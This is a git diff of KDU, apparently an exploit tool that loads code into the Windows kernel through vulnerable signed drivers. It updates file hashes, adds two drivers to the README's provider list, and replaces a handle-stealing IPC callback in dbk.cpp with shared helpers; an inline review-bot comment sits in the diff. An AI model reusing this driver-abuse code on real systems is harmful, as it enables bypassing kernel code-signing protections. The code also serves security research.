diff --git a/KDU.sha256 b/KDU.sha256
index e293055..68ee5bb 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -30,13 +30,13 @@ a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaz
c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
76ecc2d25f2a06a573ca23a2b2d851cd58424548bac98db487fadb54ff01dd50 *Source\Hamakaze\dsefix.cpp
bde58787437d8243d531f2ab1b33eda6bdf4afffdad08b63f85b16a3b65bd5fd *Source\Hamakaze\dsefix.h
-27f3972b1ee460e8cef1b62af503cbf3e885c4338af56d34e636c2b9e653676b *Source\Hamakaze\global.h
+67605bff584d9fbe3cd34905f5efeb165626cb426668fedbb3e85b587cbdffa2 *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
32566d09a9183a32a3615f987eee2153f9d61b7ea7a95c752a0af0bdd669f1d3 *Source\Hamakaze\KDU.vcxproj
2138d7f641038817debf4484c5b74d42ec4f90955d619d64425f8a42ab2bec77 *Source\Hamakaze\KDU.vcxproj.filters
650f85bfda6b1653e2f0486182ca54ac6bd67517b8a52f886a54dffc8984ef8f *Source\Hamakaze\KDU.vcxproj.user
-c60b8c1d2e6557aa0202ea15cd2d31525b0960f52be6f93956dce651df9b9a1b *Source\Hamakaze\kduplist.h
+d68453cf31b5faa408efd39f971f251d4f3460cefa868c8164bb635e25af4f75 *Source\Hamakaze\kduplist.h
0d45b44d55d3986f8dfca4528c54597cfbc7b120166d9f3d526a22b530ff4480 *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
ef4d5f53395fd0350d9cc7a3a150e23da2b2e27e49bb8acde7c9f30dd9910eb1 *Source\Hamakaze\main.cpp
@@ -49,13 +49,12 @@ b99493307cf038c5e4794a46a4c612f32278ba81be738f84945339535dbc91b5 *Source\Hamakaz
a6f3ec0bc0beb0ef152a2a33ca5cbd27bf538316ddf90545b31cd5a78114d6ec *Source\Hamakaze\shellcode.cpp
87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
-1bc7b331c4d2be8d2b7686fee741954aa7c44f9b63f2001d451bb9d4ac6c2b61 *Source\Hamakaze\shellstager.lst
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
-a6160dbf3dd84af0331f665dfd1ec81dac0ce2ba54fe2911d98bd678f6c33377 *Source\Hamakaze\sup.cpp
-58a79fa6ab7e4787e0fc58176d8ec0305552223305945de454992741a6bdde11 *Source\Hamakaze\sup.h
+7a0858c6079814599a1cd01cb7e8b868cbc09f0cd67c52fa28ffbb344314a487 *Source\Hamakaze\sup.cpp
+c9b10b4f9e02bd601c474e7045aabb130c6cbe684d350a1303f42d1d367ac7f5 *Source\Hamakaze\sup.h
d19e67019fc5666a80a153991ec3d2ac3a7e8dbe088dd9ff93d3e0d0ced91cde *Source\Hamakaze\sym.cpp
292efaabf3f6223761aef1fc418ec98108fb529c7260d9d4a72715378c6b7547 *Source\Hamakaze\sym.h
-d8236a9c9c568c5f95acfac1c301ce2b7e3d2ef7b34c95d43c9fc9a0efe8b06c *Source\Hamakaze\tests.cpp
+b3928fe0dac109a549e47d7a9a375293060268f07a1785a8c607205925fb4f5f *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
42c3ee977471fb2966d2abd804d1b69e6aeb6c5c86a02f9c75cf182b42af73c4 *Source\Hamakaze\victim.cpp
5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
@@ -70,7 +69,7 @@ de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaz
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
-498cbec6087b80ff01a3600221b27edd69db7debd6b6194a876a84af2ef5bee1 *Source\Hamakaze\idrv\dbk.cpp
+bfee96a81ea2f722f426f878032b51d8793bf3d747505f8cd5e4ab5b49bccbbc *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
8c61e22c624b7fce32fdb1c7fd3075c9d9ac5eb4f0ad3370f575f5af47a4d7c7 *Source\Hamakaze\idrv\dell.cpp
1d864cc688e8a2c38da6b94019f7efba771a0e0b7f68e1c3f8700b8caa76dda0 *Source\Hamakaze\idrv\dell.h
@@ -99,7 +98,7 @@ d281289e0cda5f4171e999bb1313aa235c54583aa8b0df3aa187af35b4ba2057 *Source\Hamakaz
5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h
f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp
399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h
-0f30979d4ffbfa0d6b56fda86bfd8974b34d4acf5b4258be263a84b8d02c4ebe *Source\Hamakaze\idrv\procexp.cpp
+a35639536902ef0c738c7a667119cce18accdef5465059fe45fe5a68cae3ae7a *Source\Hamakaze\idrv\procexp.cpp
8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h
bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp
08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h
@@ -113,15 +112,15 @@ b3a7fc6cc6a5b33a71a7f043c9a649238de2f7755075a6f5c91c2a544c81f0d8 *Source\Hamakaz
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
285c2c1c44e863142bd5d0606a2bc940fb0e444aa825a675d472860a0499d5e4 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
-60b580d363f0121caae4c6ec94143c2d4b1b1419c7593af4c412222099e68f5d *Source\Hamakaze\idrv\zodiacon.cpp
-eaf85f2c7194d38b06828bd7ac47f78f5138fe91f904560cd4df26788addb259 *Source\Hamakaze\idrv\zodiacon.h
+103e3c46a148e415a80057caf102c837702983a67d6086482030becf3e429a72 *Source\Hamakaze\idrv\zodiacon.cpp
+72be567129bf43464443801c169ebff5ea6fc276cdd6b0170044ffef974dffe1 *Source\Hamakaze\idrv\zodiacon.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
-89ca03cab3ebb32fa7a560a8f4a69e7d91b9e71f7b47c5b226b88a642e0db026 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
-8bac2488e3c8f8ee589172f959722bf41f6a8d49ea019bdd11c9bbeb2d922302 *Source\Hamakaze\res\Taigei32.bin
+91614e852fd6ba37e8bc26183abe3a767627de222bf97e82f038ce90a1c40f8e *Source\Hamakaze\res\SB_SMBUS_SDK.bin
+d8556d04891d9ae63ed5e82199092b6270b5dc5c47288d27cafd2b51a51bc729 *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
-71dcf84933af9d18e8301b3ffb1fae9197df2a352de7142040aef53f3d160390 *Source\Shared\consts.h
+d79f132ea6c7e9557da34c66ab4f33c6acade8382f7e8203e32c783345e22e80 *Source\Shared\consts.h
1cbb3b9ac4c7a6f557ddad181348002d3dfa260be724378487c7efb321162ef8 *Source\Shared\kdubase.h
-e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp
+2ee707d0b1f83f7bfe85b0f2ed4b3046757db2e44db266fd80373877dd08562d *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\minirtl\cmdline.h
@@ -152,65 +151,67 @@ d971e037b629849d999303778df77e465ef526a7e90eaea04f5983928a425ebe *Source\Shared\
a68264a684f0c19caf7f2464544d9e8163362cd919f382d08b82cbef0497a6f7 *Source\Shared\tinyaes\aes.h
541e81804b992865dcb3c7f1092b646a5c7d7dde93b83a7be489d4f452aac1bd *Source\Taigei\asio.cpp
0fb3df421a154bff00551def94069f21a91c5f7dcf6695ea1d3af036d0dd2eed *Source\Taigei\asio.h
-dd06a7140e1cd61a888c5b035120175e307be6767d44e15d0b353c4aa2a980ce *Source\Taigei\export.def
+26a3144d60bd6a0d62a3466ba90999cc4a7312b268d56bf8def4cba523364b69 *Source\Taigei\export.def
6c12bf0d697d624a35a8b233a2ee8cfb91db8aa6a6f5cc71142d3d1de98b42b4 *Source\Taigei\global.h
-ab6d1318079253cf388477ea2190837513345dd6a6a731f022e73c80ea806d58 *Source\Taigei\ipc.cpp
+33e18a0ba281cfd3205e3e6af9204e60be4e279b2ca69b5aa1db4f9628131097 *Source\Taigei\ipc.cpp
6711ef2aa6e396743d3a42adf9a901784e4d880fa07ef88873c41bdd4261ac35 *Source\Taigei\ipc.h
-3634d1725df134897618a080e43de72369011a0e118b471b064bf64e3a544ceb *Source\Taigei\main.cpp
-374468ff95a52a32877df397513ad58768a980452498e8e65656db0d6f8302b6 *Source\Taigei\Taigei.vcxproj
-d563bd3017a274175ca6b7e8f93333a3e3ec096d1f3034acfa4e17d8b2420c99 *Source\Taigei\Taigei.vcxproj.filters
+3c9d84318b072505a185e8ca1a23384a8684d02959de53e243d0687214ec99be *Source\Taigei\main.cpp
+b4c64ccefe575eda8a61b3b4cad52fcd8c2b345c7b9baf1c0c2ad9946bfc0168 *Source\Taigei\Taigei.vcxproj
+1e5949735998907c5b53ef495fb6c7942b93e33f5a2a73124fffb46fcf279c35 *Source\Taigei\Taigei.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
9e82ce97464b666dad14ffde32e5450a0974d1194ca68cd10e9b2611599dfc28 *Source\Tanikaze\export.def
5bbbcc6c275008ffdd765a3fa53ed3e4ae16ea51bf6ae66c2271f6f065ba0525 *Source\Tanikaze\main.cpp
-7c298189b908570093b38bd4080940a78a9628e6187043ae3b4b7af27316c55d *Source\Tanikaze\resource.h
-dc6c181b2c81aaa12359628ed1f4f1e684953fc1c09445e914883955db676c00 *Source\Tanikaze\resource.rc
-d1d914fbb25404b9d20baf51d247a858dc4af91598e33da2a183271324371444 *Source\Tanikaze\tanikaze.h
-598cccee803774d545c3babe8af5c6615869260274d8ef64c430a0f83fd9f48e *Source\Tanikaze\Tanikaze.vcxproj
-085298d79d85301ba7919f5eb64cf3148868997fb1111835deefc1a8e239fb03 *Source\Tanikaze\Tanikaze.vcxproj.filters
+eced6f6c4a607820b9e023bbb11be8b3511d5a0da6919be67679aeae83e69b0c *Source\Tanikaze\resource.h
+6f1bfe79355e866863977bb2c8bd98b19ba50a5e3aa1d9a81a63a3f5febe19fd *Source\Tanikaze\resource.rc
+b92186ed89413d004353b24ebe0e7abb012e823708463878bb40ca1133946171 *Source\Tanikaze\tanikaze.h
+3c4fe6d30c91cb7eb9b919f8fafc91678d02acf5c45edff5fb30566906be4a24 *Source\Tanikaze\Tanikaze.vcxproj
+51947ebb359027a63a2a0c7a29a14faee9f4e9037982477f964afb10376fa078 *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
-05a74132fb478c1e0de11934358ff24069b9c92d6e1ecfe9289ea42c742efc83 *Source\Tanikaze\data\AsusCertService.bin
-12c5b9df7a5c7f61941d26dd95bcc1d24b17f8f620bccc01d41330cfdcf78f1f *Source\Tanikaze\data\dbutilcat.bin
-23030f4f08597749f71157b99f4f08a64ac53e1a43e28807a53d88e2520ab97e *Source\Tanikaze\data\dbutilinf.bin
-7c0942d1b5140320a8649c1728f1437eccbe0ad30393899e036defce6d6de3b0 *Source\Tanikaze\data\KMUEXE.bin
-50a3b18111e1e06228b09152d2de311ab729889bfb05ce1273e1ad6b3de22b11 *Source\Tanikaze\data\KMUSIG.bin
-a5bfe4928604b22336f0a4339b018e0d39d2c6a6abe4281fb30075f96c7aae3d *Source\Tanikaze\drv\ALSysIO64.bin
-a985d7206aedc4eeeac761d1c3cbfbd98127fb69b04842e858ad35dbdaa740d2 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
-ea6373ce46e31fcfde3f11676efe499944a2286f6f4f9979e6c363f430578e25 *Source\Tanikaze\drv\amsdk.bin
-5d3da5f5fff4742b98ccd2e046c6238d06fca7254da141989bb3ee550867658e *Source\Tanikaze\drv\asio2.bin
-75f55cef23d2993c93b7ad2b8a58a6f1574d66be1de8f99ce89bf684d0273162 *Source\Tanikaze\drv\AsIO3.bin
-6393910fa9f76925a54e18be1304abbc630b3ce164c21cd1948bb2a20fdc4f6f *Source\Tanikaze\drv\AsrDrv106.bin
-634798c7bca0d32ad8ae859efcc3cfa49212f0c7a1c7b17c7b8ffa52cbf2e587 *Source\Tanikaze\drv\ATSZIO64.bin
-3f11e01732dd3a6e67c6c52d9d08370abf4979708d3ee435ad596a0cc22243ed *Source\Tanikaze\drv\dbk64.bin
-dd748d923bead36e845f4eb63afcf73b94b1123bf5fe047cf5f54f2e80d57ed2 *Source\Tanikaze\drv\DbUtil2_3.bin
-3e4cbc6da15f3757e470ae4ceae7c839d4fcf8b1efba0b66339b8cde9db421c9 *Source\Tanikaze\drv\dbutildrv2.bin
-e17daa59470157dafd05d51989656104bbcd50eb231f9e87e4e525ebe458369e *Source\Tanikaze\drv\DirectIo64.bin
-83f5599a993f90a143d8d276fdcb08b2925d920c34ecadce1c08bb2d8b08ce47 *Source\Tanikaze\drv\DirectIo64_2.bin
-946cc8ea63d8747aa793c048943b63e59a118607e40e0b205ec03f802d4c474c *Source\Tanikaze\drv\ene2.bin
-de91f013d0cd7af376a962ef7baee06ff2971f13cea259f3412cc34c017d0566 *Source\Tanikaze\drv\EneIo64.bin
-5244cd8306615fedd04a9cdd664f3fde1efc823896bbaf116939ef4e58d53bb4 *Source\Tanikaze\drv\EneTechIo64.bin
-01266121cf5fc7464f1f664b5b1397da7f87ce73ea33aaa6f808ed8ed3becbce *Source\Tanikaze\drv\etdsupp.bin
-59beafcdd7057962d9aa9c326adcd902a12cd2584f254852f17f8d7dd76039e1 *Source\Tanikaze\drv\gdrv.bin
-c8328ed776dfb4fe25e66cf8dea9843265cfcee2be012e4343568a7d755ab30f *Source\Tanikaze\drv\GLCKIO2.bin
-0babb4ab84d7a0ae08eb5d5ecb6373fce42ccc5820f886d54b0ba5b29df72998 *Source\Tanikaze\drv\gmerdrv.bin
-0151a6d779712e77e2e750871554a1a60260f6133c2af8519c2fabf3ed284fd1 *Source\Tanikaze\drv\heavenluo.bin
-73dccc203af38a41d78b7649870304a900d6e3b742d1356d8c61dd28b0bdd54d *Source\Tanikaze\drv\HW64.bin
-23faa6841925b9b2f1c1d5a6dfbb0f27a899176412b7cea300eae20488e5a204 *Source\Tanikaze\drv\inpoutx64.bin
-5cfc146db25b21643b5848d3019a09ec80cd479d47461f10b0a0bd5c9b44523b *Source\Tanikaze\drv\iQVM64.bin
-40bfc335e212e5189c72daa5a125241c32cec087feaa407b0802c4f23d13d698 *Source\Tanikaze\drv\KExplore.bin
-3c76fa843624f4d14f28889b0ca782701f446da6f60b17f84d57d5b841b58507 *Source\Tanikaze\drv\kprocesshacker.bin
-6bcf437a4ef1e7f550dffd4b63fb4fa8536e6e9357970ee0cc820183b0ada98e *Source\Tanikaze\drv\LDD.bin
-38efe2d15f562b3e7d71a2c4fbbe6cf2cd989db66ea8cb2024166db62284f5d9 *Source\Tanikaze\drv\lha.bin
-5ec1e3565a783639e51483418c141fc2ee21a9d010f9d7fd6e8952a9977a901b *Source\Tanikaze\drv\mimidrv.bin
-02661b0431aee575e31a1e620cbda148a1517c83eb11f099c0aa1bb1e49f5632 *Source\Tanikaze\drv\MsIo64.bin
-94388c6863689eb2249398c8e1dfd7c82af4e1b38f797f8ed98f7d3af8c3e4c8 *Source\Tanikaze\drv\pcdsrvc_x64.bin
-2ec405e99b825450472517c1dd7df459b151bd366535fa32f32892831ed43588 *Source\Tanikaze\drv\Phymemx64.bin
-de171d43f9a7ab916d0921974d6e81c63c1e1e1d07cea81c976535c913445121 *Source\Tanikaze\drv\physmem.bin
-d46a395cf2223b1ee4abf5d2eaf37f4f736fb8e8beea1e049e8ffed49ed437a8 *Source\Tanikaze\drv\procexp1627.bin
-40ff7320fc1e487d5525f852fb673145714dad3f8b89ed027b1aa10950d82c2d *Source\Tanikaze\drv\procexp1702.bin
-b56ca239054baf6708943c3101096cffa7d9fe96d0dc5aa1ba55cf3c3e97665e *Source\Tanikaze\drv\RTCore64.bin
-cbaaef88409385d1cfbfe4262055ea9d8d5b1ff3378bdf63b3790ef8978e46ce *Source\Tanikaze\drv\rtkio64.bin
-ed1123ada8dc777bc23b3977ccb6a33e451df65e43959f0210beb0ccda2d4a6a *Source\Tanikaze\drv\SysDrv3S.bin
-aa52f47c7793b5aa74c9cf65ad3478637a8c7c0c8d856787c221abe869ab1a57 *Source\Tanikaze\drv\WinRing0x64.bin
+67034ee07c357dc82c9946389d60735f2bc1b3a0e13b4f5c739ba5178a76c27c *Source\Tanikaze\data\AsusCertService.bin
+47136911450d1da1851ff264503e0247bb1c9c1c2457ccb33ac3d458fe159aae *Source\Tanikaze\data\dbutilcat.bin
+3a5f6f40824548130c6c7c7b1969315d01fc58934acb41aa0b5b8664c4b4f66e *Source\Tanikaze\data\dbutilinf.bin
+7e82a859d6c8868db34d624b96cceab9f083beb9492efcddf23f64c47923ba71 *Source\Tanikaze\data\KMUEXE.bin
+a442fb71ed8b762b678656ae1b65b29f72c85e3ec4769082a946f7b72e1406d0 *Source\Tanikaze\data\KMUSIG.bin
+4050c510f1e4a23dc4e6fa2ba3ad24db2ec0ececd1059e99703601f8633c40f7 *Source\Tanikaze\drv\ALSysIO64.bin
+5da885ddffd338f4b4b73ba985a5fc29100d944b927663e9a7c890a176483090 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
+d135b1a1591dd4ed98cd30e8eb9ece782c0288a7aca3970d9c1ae73658ff4af9 *Source\Tanikaze\drv\amsdk.bin
+6da78e5ba96e7f99947bddec66901f673e6f1b2a097b2faa614135fada5a8f45 *Source\Tanikaze\drv\asio2.bin
+9e1a3369b34f5ea17af2ab6dcfa202143a0a66876e842c7b8933315187bb5bea *Source\Tanikaze\drv\AsIO3.bin
+6bdeaa758f1d0d1190ea44c947295b13cfcdda0c1b246872603f84edf32d1511 *Source\Tanikaze\drv\AsrDrv106.bin
+62da1832d11c607c5fc084be801fdfa2ba018fa25b6aa4347ea947d7a72b932c *Source\Tanikaze\drv\ATSZIO64.bin
+6b71600dec1e692346f072e97a36bfa609f2cdfd19884ec3a77776a13cec335a *Source\Tanikaze\drv\dbk64.bin
+d06a92ed4e46748195a44fc256efd333d50a2cb03274ae5c928eb5d7165cbaf6 *Source\Tanikaze\drv\DbUtil2_3.bin
+9de5ac6cd3b656c788356f25c9d273d90bcd28cc51beb077383d17c4066913be *Source\Tanikaze\drv\dbutildrv2.bin
+b3c03c58b831ec19e36905ae663f2399a8c3a73f8d44dbf0a8bdbf85bf6cb5d9 *Source\Tanikaze\drv\DirectIo64.bin
+c88b12ea45f176b2ea0380adb803fbd7fd6366f740e056f1c337bb7284f21f20 *Source\Tanikaze\drv\DirectIo64_2.bin
+854d85abccb257451c6fecf545851729ccf917dab26ba0111445a166e73481ad *Source\Tanikaze\drv\ene2.bin
+67995474c3d769ebe6ecc45e3e771f95a3b038276e4cf121079e94dfdf7319a4 *Source\Tanikaze\drv\EneIo64.bin
+516da7aedd204918046e19e59de2dcf7368a7a5c652153581d14125f4e16de1e *Source\Tanikaze\drv\EneTechIo64.bin
+2e94a7a81428e14b7a41b406ce2d1a447335f7e197cefbbe1ecefdafd42ab9a5 *Source\Tanikaze\drv\etdsupp.bin
+4535e9f79f940c6e5dfe0cdf64814462fbb8c7bdd0e9374a67e55979281d77df *Source\Tanikaze\drv\gdrv.bin
+d73c2f99841217ff59c00c385a59237ce359ba74e427f180d1a50ec3f9695308 *Source\Tanikaze\drv\GLCKIO2.bin
+d10329323a4ad49d6cb604345c60ef134b84d9f313350646584baf7d9cbf15ba *Source\Tanikaze\drv\gmerdrv.bin
+8462d57c08a2c056c2eb510c233a0480dfb0ce3745614ef2f82ab2c8819e5a36 *Source\Tanikaze\drv\heavenluo.bin
+c0c2f175df1e67457f475a5e544e3e520815cc23a2847eaffbc3260b1503caea *Source\Tanikaze\drv\HW64.bin
+a69febeed32057ea0588b13f8d80a4d1d6c20356bd10575f7db4ee3b447ae6d2 *Source\Tanikaze\drv\inpoutx64.bin
+cf4c4790b582dbc819c9f4ab32e42b67b4606c5d1e31392a70ae31fae0f0d4e6 *Source\Tanikaze\drv\iQVM64.bin
+fabed16b24a313943443ee4738d8ac263745160b9bf361a5e08006b764eded61 *Source\Tanikaze\drv\KExplore.bin
+001b2a9ddf541a945a7c1d6c8d2c23bc928ff06fd1ee4da7edc3df6986c771a0 *Source\Tanikaze\drv\KObjExp.bin
+46b04352250ebb95874ef18ec64fa31ea373ce90635680d299f8edb19cdfe845 *Source\Tanikaze\drv\kprocesshacker.bin
+4cf689502b2e47509f2d8eb4a33a9e271d88e26564a8b18fc3fefee7b7145966 *Source\Tanikaze\drv\KRegExp.bin
+559b56db6f3ba36116d3c6b1b2818775a488d0e8e0ed516753c56473c6102653 *Source\Tanikaze\drv\LDD.bin
+515a4bb03eddb2fb593e3504ec3f12c74639dc15b5fac3359e3bae3922751e4f *Source\Tanikaze\drv\lha.bin
+e604c513e4ba37129c89e971037ea2ef934531d41cc41c70f03159c5ee1474e0 *Source\Tanikaze\drv\mimidrv.bin
+9b63dca03a09f9d0c800e5d148178abc3f19eb949c78a6a61656132926d394aa *Source\Tanikaze\drv\MsIo64.bin
+e3b4040b72239735baf44cedc265ef2c3086d6cf700e36e3dcb6bc6363bf6667 *Source\Tanikaze\drv\pcdsrvc_x64.bin
+eaadbb1c692bc0fc7c49bc05596f764d3edafb0098eb13056d6cb19f4a0f3bff *Source\Tanikaze\drv\Phymemx64.bin
+c3467992e4e57d664a77b5a91b6ba408260350e4ee95604b00ca0abec2050112 *Source\Tanikaze\drv\physmem.bin
+82136994a4ebc411719dcf8b03827c50077a0f72507a52c370b4d36f830d2cd9 *Source\Tanikaze\drv\procexp1627.bin
+3174769519d1ef32c92a1eb3f34efa68c21fe4f083e316c34507dbab22e23576 *Source\Tanikaze\drv\procexp1702.bin
+46e639fb328967b05e5056cfa9da5ca4a8095b8a7628e2185c8f498624b9ac6d *Source\Tanikaze\drv\RTCore64.bin
+dd6498ed873d32ac715c8de6aef5001f8acf454685a7b1c05dac4462bf17892b *Source\Tanikaze\drv\rtkio64.bin
+cd24bdba7ebe4b9c65e54c03e9f1a56fdaf6151b0e5fc4937d6a74a3c7f22fb7 *Source\Tanikaze\drv\SysDrv3S.bin
+83867dc3e4f5d063556eba30e398fa745b8c987c3baa6b4bea073bdba62b3dc1 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
diff --git a/README.md b/README.md
index 9057308..33d0d9c 100644
--- a/README.md
+++ b/README.md
@@ -141,6 +141,8 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 34 | MSI | winio | MSI Foundation Service | WINIO | Undefined | |
| 35 | HP | EtdSupport | ETDi Support Driver | Original | 18.0 and below | |
| 36 | Pavel Yosifovich | KExplore | Kernel Explorer | Original | Undefined | |
+| 37 | Pavel Yosifovich | KObjExp | Kernel Object Explorer | Original | Undefined | |
+| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Original | Undefined | |
###### *At commit time, data maybe inaccurate.
diff --git a/Source/Hamakaze/global.h b/Source/Hamakaze/global.h
index 0686d80..9af0c81 100644
--- a/Source/Hamakaze/global.h
+++ b/Source/Hamakaze/global.h
@@ -77,6 +77,7 @@ extern "C" {
#include "shared/consts.h"
#include "shared/kdubase.h"
#include "sig.h"
+#include "ipcsvc.h"
#include "sup.h"
#include "sym.h"
#include "compress.h"
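Review bot: Moving `#include "ipcsvc.h"` above `sup.h` (here and in the removal in the next hunk) makes the build depend on include order inside global.h. sup.h is not visible in this diff, but it presumably now declares the shared `supIpc*` callbacks and needs the IPC message type (`PKDU_MSG`) to be declared before it. If that is the case, sup.h should include `ipcsvc.h` itself, or this line should carry a comment such as `// must precede sup.h: sup.h declares IPC callbacks`.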
@@ -87,7 +88,6 @@ extern "C" {
#include "ps.h"
#include "pagewalk.h"
#include "dsefix.h"
-#include "ipcsvc.h"
#include "diag.h"
#include "tests.h"
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index 62ebd6a..497f5e9 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: DBK.CPP
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 09 Apr 2023
+* DATE: 10 Jun 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -21,8 +21,6 @@
#include "idrv/dbk.h"
#include "idrv/ldrsc.h"
-#define DBK_GET_HANDLE 0x1337
-
#define DBK_LDR_DLL L"u.dll"
#define DBK_KMU_EXE L"kernelmoduleunloader.exe"
#define DBK_KMU_SIG L"kernelmoduleunloader.exe.sig"
@@ -67,83 +65,6 @@ NTSTATUS CALLBACK DbkSetupCheatEngineObjectNames(
return ntStatus;
}
-/*
-* DbkpIpcOnException
-*
-* Purpose:
-*
-* ALPC receive exception callback.
-*
-*/
-VOID CALLBACK DbkpIpcOnException(
- _In_ ULONG ExceptionCode,
- _In_opt_ PVOID UserContext
-)
-{
- UNREFERENCED_PARAMETER(UserContext);
-
- supPrintfEvent(kduEventError,
- "[!] Exception 0x%lx thrown during IPC callback\r\n", ExceptionCode);
-}
-
-/*
-* DbkpIpcCallback
-*
-* Purpose:
-*
-* ALPC receive message callback.
-*
-*/
-VOID CALLBACK DbkpIpcCallback(
- _In_ PCLIENT_ID ClientId,
- _In_ PKDU_MSG Message,
- _In_opt_ PVOID UserContext
-)
-{
- KDU_CONTEXT* Context = (PKDU_CONTEXT)UserContext;
-
- if (Context == NULL)
- return;
-
- __try {
-
- if (Message->Function == DBK_GET_HANDLE &&
- Message->Status == STATUS_SECRET_TOO_LONG &&
- Message->ReturnedLength == sizeof(ULONG))
- {
- HANDLE hProcess = NULL, hNewHandle = NULL;
- OBJECT_ATTRIBUTES obja;
-
- InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
-
- if (NT_SUCCESS(NtOpenProcess(&hProcess,
- PROCESS_DUP_HANDLE | PROCESS_TERMINATE,
- &obja,
- ClientId)))
- {
- if (NT_SUCCESS(NtDuplicateObject(
- hProcess,
- (HANDLE)Message->Data,
- NtCurrentProcess(),
- &hNewHandle,
- 0,
- 0,
- DUPLICATE_SAME_ACCESS)))
- {
- Context->DeviceHandle = hNewHandle;
- }
-
- NtTerminateProcess(hProcess, STATUS_TOO_MANY_SECRETS);
- NtClose(hProcess);
- }
-
- }
- }
- __except (EXCEPTION_EXECUTE_HANDLER) {
- return;
- }
-}
-
/*
* DbkOpenCheatEngineDriver
*
@@ -218,8 +139,8 @@ BOOL DbkOpenCheatEngineDriver(
sizeof(g_KduLoaderShellcode),
&memIO))
{
- ipcServer = IpcStartApiServer(DbkpIpcCallback,
- DbkpIpcOnException,
+ ipcServer = IpcStartApiServer(supIpcDuplicateHandleCallback,
+ supIpcOnException,
NULL,
NULL,
(PVOID)Context);
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
